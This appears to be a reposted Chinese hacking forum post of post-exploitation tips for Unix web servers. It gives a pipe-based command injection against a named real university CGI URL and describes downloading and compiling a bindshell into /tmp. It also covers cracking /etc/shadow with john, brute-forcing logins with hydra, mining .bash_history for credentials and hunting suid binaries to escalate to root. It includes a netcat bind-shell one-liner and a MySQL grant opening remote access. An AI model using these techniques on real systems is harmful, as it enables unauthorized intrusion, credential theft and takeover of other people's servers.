大部分技巧來源于我家學究天人的eong大大
用wget把bindshell下載到/tmp/目錄下
或者再/etc/inetd.conf可寫的情況下直接開一個交互的shell
然后用gcc編譯
_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|ls -al" rel=nofollow>http://cgiserver.sogang.ac.kr/~gsvi...ilename=rb9.txt|ls -al|
ls -al顯示文件

||中間的是顯示的命令
很簡單的辦法是得到用戶

1。我是說用hydra猜測密碼，思路混亂的時候打成john跑shadow了。你可能有疑問，有了shell，為什么還要跑普通用戶的密碼（root經(jīng)常是不能登陸的）。主要是為了查看.bash_history和其他資料，以及獲取一個能夠通過ssh/ftp/telnet 登陸的賬號。也要考慮到proftpd_0day 之類的是需要一個能夠正常登陸的賬號的。沒有這個webshell我也不會跑了，因為我連用戶名(/etc/passwd)都不知道。.bash_history很可能已經(jīng)包括了你所需要的user/pass.例如mysql的，還包括了管理員通常會訪問的其他服務器。當然不是所有機器的訪問限制都那么嚴格。/home對nobody來說也是經(jīng)?？勺x的?？墒俏覀儽仨毧紤]所有情況。
2。如果你所知道的所有的vul都被補上了，面對所有的suid你都無能為力的時候。也許通過一個可以su -的賬號你可以騙出root權限。
3。對于我個人來說，用john跑shadow是為了完善我自己的密碼/密碼規(guī)則庫。
4。我從來沒有把netcat和pipe 結(jié)合一起使用過，沒有經(jīng)驗。也請你指教一下。
To blackfox:
搜索suid是有必要的，原因嘛。。不單純是為了exploit一個suid程序，也反映了管理員的安全意識層次嘛。當然也許這年頭還會有suidshell的存在。

exec`nc -l -n -p 60000 -e /bin/sh`
nc下載地址：http://www.leftworld.net/download/show?id=316.html

mysql的ip禁止連接的打開方法：
find / -name my.cnf -print
mysql> grant all on *.* to username@IP identified by 'password';

版權聲明：本站文章來源標注為YINGSOO的內(nèi)容版權均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務器上建立鏡像，否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學習參考，不代表本站立場，如有內(nèi)容涉嫌侵權，請聯(lián)系alex-e#qq.com處理。